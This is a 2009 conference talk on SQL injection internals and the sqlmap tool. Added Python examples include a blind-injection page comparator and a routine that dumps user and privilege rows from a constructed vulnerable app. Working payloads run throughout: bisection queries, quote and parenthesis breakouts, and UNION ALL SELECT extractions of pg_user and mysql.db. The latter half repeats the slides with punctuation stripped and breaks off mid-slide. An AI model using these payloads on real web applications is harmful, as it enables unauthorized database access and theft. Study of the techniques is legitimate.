SQL injection exploitation internals
How do I exploit this web application injection point?

Intercon III, London, January 9 2009
Bernardo Damele A. G. <bernardo.damele@gmail.com>

About me
Bernardo Damele A. G.
Proud father
Penetration Tester and Security Researcher
Currently working at Portcullis Computer Security Ltd
sqlmap lead developer

SQL what? (1/2)
From the OWASP Testing Guide:
"SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands."
There are plenty of resources on the Net about the SQL injection concept; it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile: http://delicious.com/inquis/sqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me: "An image is worth a thousand words"

SQL what? (2/2)
(xkcd comic "Exploits of a Mom") Source: http://xkcd.com/327

State of art
All right, tons of resources, and I am still presenting about SQL injection. Why?
Because:
New techniques have been released in the last year
Some aspects have been overlooked in the past
It is fun

How does it work?
Basically, the steps to go through are:
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user's privileges, the back-end DBMS and the security settings in place server-side, a SQL injection issue leads, on the DBMS server, to:
Unauthorized access to DBMS data
File system read and write access
Operating system command execution

sqlmap
sqlmap is an automatic SQL injection tool
Developed in Python. Started in July 2006 by Daniele Bellucci; I took over in December 2006
Licensed under the terms of the GPLv2
Detects and takes advantage of SQL injection vulnerabilities in web applications. The user can choose to:
Perform an extensive back-end DBMS fingerprint
Enumerate users, password hashes, privileges, databases, tables, columns and their data types
Dump entire database tables or user-specified entries
Run custom SQL statements, and more

sqlmap features (1/2)
sqlmap key features:
Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques:
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target acquisition from the user, by parsing WebScarab/Burp proxies' request log files, or by Google dorking
Tests for injection flaws on GET and POST parameters, the HTTP User-Agent header and Cookie values

sqlmap features (2/2)
More features:
Silent to verbose output messages
Granularity in the user's options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line and/or configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing your own queries, depending on the session user's privileges and the back-end DBMS

Real world
"Have you ever had a dream, Neo, that you were so sure was real? What if you were unable to wake from that dream? How would you know the difference between the dream world and the real world?"
Morpheus, The Matrix

Dealing with advertisements (1/3)
In the real world, web applications are often complex
Usually the page content changes at each refresh
They have inline counters, advertisement banners, clocks, etc.
The inferential blind SQL injection algorithm is based on the concept that the HTTP response differs depending on whether the injected SQL condition evaluates to True or False

Dealing with advertisements (2/3)
Obstacle:
If the page content does not depend only on the SQL statement, and changes at each refresh, then the algorithm may not work

Dealing with advertisements (3/3)
The Python difflib library helped to solve this problem: for each HTTP response, sqlmap calls a function that compares the returned page content with the untouched original page content
It returns a measure of the two pages' similarity as a float in the range [0, 1], rounded to 3 decimal places
It works also when the original page is stable but the page returned for the injected query with a valid condition (True) differs from it
If the automatic comparison fails, the user can provide a string or a regular expression that must match on both the original and the True page content, and must not match on the False page content
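An added illustration of the comparison described above (example code, not sqlmap's own): three constructed responses share one template but carry a hit counter, a clock and a rotating ad banner, so byte-for-byte comparison fails while a difflib.SequenceMatcher ratio, rounded to three places, still separates the True page from the False one. The midpoint threshold calibration and the string/regexp override are this example's design; they only loosely mirror sqlmap's --string and --regexp options.

```python
import re
from difflib import SequenceMatcher


def render_page(content, hits, clock, ad_id):
    """Constructed intranet page: a stable template around a hit counter, a clock
    and a rotating ad, i.e. a page that changes on every refresh."""
    return (
        "<html><head><title>Intranet portal</title></head><body>\n"
        f"<div class='banner'>Sponsored link #{ad_id}</div>\n"
        "<nav>Home | Users | Reports | Settings | Logout</nav>\n"
        f"<div id='content'>{content}</div>\n"
        f"<footer>Visitors today: {hits} - Server time: {clock}</footer>\n"
        "</body></html>\n"
    )


# Content shown when the WHERE condition holds (record found) and when it does not.
TRUE_CONTENT = (
    "<h1>User details</h1><table>"
    "<tr><td>Login</td><td>admin</td></tr>"
    "<tr><td>Role</td><td>dba</td></tr>"
    "<tr><td>Last login</td><td>2009-01-09 10:41:55</td></tr>"
    "<tr><td>E-mail</td><td>admin@example.test</td></tr></table>"
)
FALSE_CONTENT = "<p class='error'>No matching record found.</p>"

# Constructed responses: the untouched original request, a request with a True
# condition injected (same record, new counter/clock/ad) and one with a False one.
ORIGINAL_PAGE = render_page(TRUE_CONTENT, 1041, "10:42:07", 3382)
TRUE_PAGE = render_page(TRUE_CONTENT, 1042, "10:42:09", 7710)
FALSE_PAGE = render_page(FALSE_CONTENT, 1043, "10:42:11", 5104)


class PageComparator:
    """Decides True/False for an injected condition by comparing each response
    with the original page. Threshold calibration and the string/regexp override
    are this example's own choices, not sqlmap's implementation."""

    def __init__(self, original, digits=3):
        self.original = original
        self.digits = digits
        self.threshold = None
        self.match_string = None   # user-supplied string, in the spirit of --string
        self.match_regexp = None   # user-supplied regexp, in the spirit of --regexp

    def ratio(self, page):
        # autojunk=False keeps difflib from discarding frequent characters as
        # "popular" junk on pages longer than 200 bytes, which would skew the ratio.
        matcher = SequenceMatcher(None, self.original, page, autojunk=False)
        return round(matcher.ratio(), self.digits)

    def calibrate(self, true_page, false_page):
        """Learn the threshold from one known-True and one known-False response."""
        r_true, r_false = self.ratio(true_page), self.ratio(false_page)
        if r_true <= r_false:
            raise ValueError("True and False pages are not separable by similarity")
        self.threshold = round((r_true + r_false) / 2, self.digits)
        return self.threshold

    def is_true(self, page):
        # A user-supplied string/regexp takes precedence over the similarity test.
        if self.match_regexp is not None:
            return re.search(self.match_regexp, page) is not None
        if self.match_string is not None:
            return self.match_string in page
        if self.threshold is None:
            raise RuntimeError("calibrate() first, or set match_string/match_regexp")
        return self.ratio(page) >= self.threshold


def demo():
    """Ratios and verdicts for the constructed pages, including two fresh responses."""
    comparator = PageComparator(ORIGINAL_PAGE)
    threshold = comparator.calibrate(TRUE_PAGE, FALSE_PAGE)
    later_true = render_page(TRUE_CONTENT, 1050, "10:43:31", 1180)
    later_false = render_page(FALSE_CONTENT, 1051, "10:43:33", 9931)
    return {
        "exact_match_works": ORIGINAL_PAGE == TRUE_PAGE,
        "ratio_true": comparator.ratio(TRUE_PAGE),
        "ratio_false": comparator.ratio(FALSE_PAGE),
        "threshold": threshold,
        "later_true": comparator.is_true(later_true),
        "later_false": comparator.is_true(later_false),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The exact comparison is False even for the True page, because the counter, clock and ad changed; the ratio test classifies later requests correctly as long as the dynamic parts are small relative to the page. When they are not, the string/regexp override is the way out, and it must be something present in the original and True pages but absent from the False one.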

To NULL or not to NULL (1/4)
In standard SQL, NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique, a bisection algorithm is usually used to identify whether the ordinal value of the Nth query output character is higher than a certain ASCII table number; this causes the page content to be True or False
The SQL statement used by sqlmap, depending on the back-end DBMS, is similar to:
ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number

To NULL or not to NULL (2/4)
Obstacle:
On some DBMS the substring function cannot be used on NULL
Even where it is allowed, the result is NULL, and a comparison against NULL never evaluates to True, so the bisection cannot tell a NULL field from a wrong guess

To NULL or not to NULL (3/4)
A possible solution to this problem consists in modifying all the SQL query's columns explicitly:
Casting each output to a string
Returning a value (a space) if the casted value is still NULL
Example on MySQL 5.0. The SQL query to enumerate the first entry of the column name is:
SELECT name FROM test.users LIMIT 0, 1
Casted SQL query:
SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1

To NULL or not to NULL (4/4)
The inferential blind SQL injected statement will then be:
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), Nth SQL query output character, 1)) > Bisection algorithm number
URL encoded (here for the first output character and the bisection number 63):
ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063

SQL payload (1/3)
You have got an injection point
The injection point is in a SQL statement as follows:
SELECT * FROM users WHERE id LIKE ((( '$_GET['id']' ))) LIMIT 0, 1

SQL payload (2/3)
Obstacle:
The injection is after a LIKE clause, inside a quoted string within three parentheses; the statement terminates with a LIMIT clause

SQL payload (3/3)
In this example the SQL payload that sqlmap identifies is:
id=1'))) AND ((('RaNd' LIKE 'RaNd
The leading quote and parentheses close the application's own LIKE operand; the trailing 'RaNd is closed by the quote and parentheses the application appends, so the statement stays syntactically valid
In the inferential blind SQL injection algorithm it will be:
id=1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd
In the UNION query SQL injection technique it will be:
id=1'))) UNION ALL SELECT NULL, Concatenated SQL query, NULL AND ((('RaNd' LIKE 'RaNd

First demo
"I did every demo possible to see if the things would do what they were promising they would do."
Doug Hall

Bypass columns limitation (1/4)
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you, by NULL brute-forcing or by ORDER BY clause brute-forcing, depending on your options

Bypass columns limitation (2/4)
Obstacle:
The number of columns in the web application's SELECT statement is lower than the number of columns of your UNION ALL SELECT statement

Bypass columns limitation (3/4)
A possible solution consists in concatenating your SELECT statement's columns into a single output, by using the DBMS-specific string concatenation operator or function
Example on PostgreSQL 8.3, to retrieve the users' privileges
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
The CHR() runs decode to random marker strings (SrlGVt opens the output, hdzQyZ separates the columns, KyPADf closes it) so that the result can be located and split in the page content without putting quote characters in the payload; COALESCE keeps a NULL field from turning the whole concatenation into NULL

Going partial UNION (1/3)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection. Only the query output's first entry, or a range of entries, is displayed in the page content

Going partial UNION (2/3)
sqlmap automates a known technique:
Changes the parameter value to its negative value, causing the original query to produce no output
Inspects and unpacks the provided SQL statement
Calculates its output's number of entries
Limits it, after the UNION ALL SELECT, to return one entry at a time
Repeats the previous action N times, where N is equal to the number of entries

Going partial UNION (3/3)
Example on MySQL 4.1, to enumerate the list of databases
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,88,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
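An added example (not sqlmap's code) of the "Bypass columns limitation" and "Going partial UNION" slides end to end: four columns are squeezed into the one visible column between random markers, a negative id silences the original query, a COUNT(*) round trip gives the number of entries, and then one entry is fetched per request and split on the separator. SQLite stands in for PostgreSQL/MySQL (char() and || for the CHR()/CHAR() and CONCAT() forms, CAST AS TEXT for CHARACTER(10000)); the articles table, the pg_user look-alike with a NULL usename, and the application are constructed.

```python
import random
import re
import sqlite3
import string

# Constructed target. The application runs
#   SELECT id, title, body FROM articles WHERE id=<id>
# and prints the title of the first row only: the 'partial UNION' situation.
# The table to dump mirrors the four pg_user columns from the slides; one row has a NULL usename.
SCHEMA = """
CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
INSERT INTO articles VALUES (1, 'Welcome', 'First article');
CREATE TABLE pg_user (usename TEXT, usecreatedb INTEGER, usesuper INTEGER, usecatupd INTEGER);
INSERT INTO pg_user VALUES ('postgres', 1, 1, 1);
INSERT INTO pg_user VALUES ('webapp', 0, 0, 0);
INSERT INTO pg_user VALUES (NULL, 0, 1, 0);
"""
APP_COLUMNS = 3      # columns in the application's own SELECT
VISIBLE_COLUMN = 1   # the only one echoed into the page (title)


class VulnerableApp:
    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript(SCHEMA)

    def page(self, id_param):
        sql = f"SELECT id, title, body FROM articles WHERE id={id_param}"
        row = self.conn.execute(sql).fetchone()    # first entry only
        title = row[VISIBLE_COLUMN] if row else "no such article"
        return f"<html><body><h1>{title}</h1></body></html>"


def char_literal(text):
    """Encode a marker as char(...), SQLite's spelling of the slides' CHR()/CHAR()
    runs, so the payload needs no quote characters."""
    return "char(" + ",".join(str(ord(c)) for c in text) + ")"


def random_marker(length=6):
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def build_union(columns, table, offset, markers):
    """UNION ALL SELECT that concatenates every wanted column into the single
    visible column, delimited by markers, returning one entry (offset) per request."""
    start, sep, end = markers
    parts = [char_literal(start)]
    for i, col in enumerate(columns):
        if i:
            parts.append(char_literal(sep))
        # COALESCE: a NULL field would otherwise make the whole concatenation NULL
        parts.append(f"COALESCE(CAST({col} AS TEXT), char(32))")
    parts.append(char_literal(end))
    cells = ["NULL"] * APP_COLUMNS
    cells[VISIBLE_COLUMN] = "||".join(parts)
    # -1 makes the original query return nothing, so our row becomes the first entry
    return f"-1 UNION ALL SELECT {', '.join(cells)} FROM {table} LIMIT 1 OFFSET {offset}"


def dump_table(app, columns, table):
    """Count the entries, then fetch them one at a time through the visible column."""
    markers = (random_marker(), random_marker(), random_marker())
    start, sep, end = markers
    pattern = re.compile(re.escape(start) + "(.*?)" + re.escape(end), re.S)
    count_page = app.page(build_union(["COUNT(*)"], table, 0, markers))
    count = int(pattern.search(count_page).group(1))
    rows = []
    for offset in range(count):
        match = pattern.search(app.page(build_union(columns, table, offset, markers)))
        rows.append(tuple(match.group(1).split(sep)))
    return rows


if __name__ == "__main__":
    app = VulnerableApp()
    for row in dump_table(app, ["usename", "usecreatedb", "usesuper", "usecatupd"], "pg_user"):
        print(row)
```

The NULL usename row comes back as a single space, which is exactly what COALESCE(..., CHR(32)) buys in the PostgreSQL payload on the slide; drop it and that row's visible column is NULL, so the markers never appear and the regular expression finds nothing.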

DBMS fingerprint (1/4)
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well-known techniques and a few overlooked techniques
sqlmap implements up to four techniques; three of these are in use by other tools
The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint, based on one or two techniques, is done: only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent

DBMS fingerprint (2/4)
The techniques implemented to perform an extensive back-end DBMS fingerprint are:
Inband error messages
Banner parsing
SQL dialect
Specific functions' static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable

DBMS fingerprint (3/4)
Example of basic back-end DBMS fingerprint on PostgreSQL 8.3
The techniques in use are two
The two SQL queries injected to identify it are:
AND <integer>::int=<integer>  (SQL dialect: the :: cast syntax is PostgreSQL-specific)
AND COALESCE(<integer>, NULL)=<integer>  (specific function static output comparison)

DBMS fingerprint (4/4)
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is:
active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
html error message fingerprint: Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions' static output comparison

More on fingerprint
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): known technique
Back-end DBMS operating system, by parsing the DBMS banner: overlooked technique
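An added example (not sqlmap's code) of the banner parsing technique mentioned above, extended to the operating system: the banners are constructed in the shapes the four DBMSs return for a version query, the SQL Server 2005 build-to-service-pack table and the Windows NT version names are public facts, and the regular expressions and output layout are this example's own.

```python
import re

# Constructed banners, in the formats the four DBMSs return for a version query
# (SELECT @@version on Microsoft SQL Server, VERSION() on MySQL and PostgreSQL,
# SELECT banner FROM v$version on Oracle).
SAMPLE_BANNERS = {
    "mssql": (
        "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n"
        "\tOct 14 2005 00:33:37 \n"
        "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
        "\tStandard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)\n"
    ),
    "mysql": "5.0.51a-3ubuntu5",
    "postgresql": "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1) 4.3.2",
    "oracle": "Oracle Database 10g Express Edition Release 10.2.0.1.0 - Production",
}

# SQL Server 2005 build numbers and the service pack each one corresponds to.
MSSQL_2005_BUILDS = {"9.00.1399": 0, "9.00.2047": 1, "9.00.3042": 2, "9.00.4035": 3}
# Windows NT kernel versions and the products that ship them.
WINDOWS_NT = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003",
              "6.0": "Windows Vista / Server 2008", "6.1": "Windows 7 / Server 2008 R2"}


def parse_banner(banner):
    """Extract DBMS, version and, where the banner carries it, the underlying OS."""
    info = {"dbms": None, "version": None, "service_pack": None, "os": None}

    m = re.match(r"Microsoft SQL Server (\d{4}) - (\d+\.\d+\.\d+)\.\d+", banner)
    if m:
        info["dbms"] = f"Microsoft SQL Server {m.group(1)}"
        info["version"] = m.group(2)
        info["service_pack"] = MSSQL_2005_BUILDS.get(m.group(2))
        # The last banner line names the Windows kernel version, build and service pack.
        os_m = re.search(r"on Windows NT (\d+\.\d+) \(Build (\d+)(?:: (Service Pack \d+))?\)", banner)
        if os_m:
            name = WINDOWS_NT.get(os_m.group(1), f"Windows NT {os_m.group(1)}")
            info["os"] = f"{name} (build {os_m.group(2)})"
            if os_m.group(3):
                info["os"] += f" {os_m.group(3)}"
        return info

    m = re.match(r"PostgreSQL (\d+\.\d+(?:\.\d+)?) on (\S+?),", banner)
    if m:
        info["dbms"] = "PostgreSQL"
        info["version"] = m.group(1)
        # The build target triple names the OS: i486-pc-linux-gnu -> linux
        triple = m.group(2).split("-")
        info["os"] = triple[2] if len(triple) >= 3 else None
        return info

    m = re.match(r"Oracle Database (\w+) .*Release (\d+(?:\.\d+)+)", banner)
    if m:
        info["dbms"] = f"Oracle {m.group(1)}"
        info["version"] = m.group(2)
        return info   # the Oracle banner carries no OS information

    m = re.match(r"(\d+\.\d+\.\d+[a-z]?)(?:-(\S+))?$", banner)
    if m:
        info["dbms"] = "MySQL"
        info["version"] = m.group(1)
        # A distribution suffix such as -3ubuntu5 gives the packager, hence the OS, away.
        suffix = (m.group(2) or "").lower()
        if "ubuntu" in suffix:
            info["os"] = "Ubuntu Linux"
        return info

    return info


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, parse_banner(banner))
```

The SQL Server banner is the richest: the build number yields the service pack the slide reports (9.00.1399 is the 2005 release build, hence "Service Pack 0") and the trailing line yields the Windows version, all from the one request that retrieved the banner. PostgreSQL leaks the OS through its build target triple, MySQL through a distribution suffix when there is one, and the Oracle banner says nothing about the host.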

Second demo
"A demo? As in demolish or demonstration?"
Cyclops, X-Men Evolution

Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, provided the web application supports them

Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' data types, etc.
There is an option to dump the whole back-end DBMS

Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line and/or configuration file
Options are documented in the user's manual, with examples

Third demo
"I get tons of uninteresting mail and system announcements about babies born, etc. At least a demo MIGHT have been interesting."
Richard Stallman

Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time-based blind SQL injection technique
... but I am working on these and others

Want to contribute?
I am always looking forward to code contributions
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area

Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com

References
OWASP Testing Guide, Open Web Application Security Project
Exploits of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A. G.
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)

Questions?
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 2
About meBernardo Damele A G
Proud father
Penetration Tester and Security Researcher
Currently working at Portcullis Computer Security Ltd
sqlmap lead developer
Intercon III London ndash January 9 2009 3
SQL what (12) From the OWASP Testing Guide
ldquoSQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commandsrdquo
There are plenty of resources on the Net about SQL injection concept it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile httpdeliciouscominquissqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me
ldquoAn image is worth thousands wordsrdquo
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
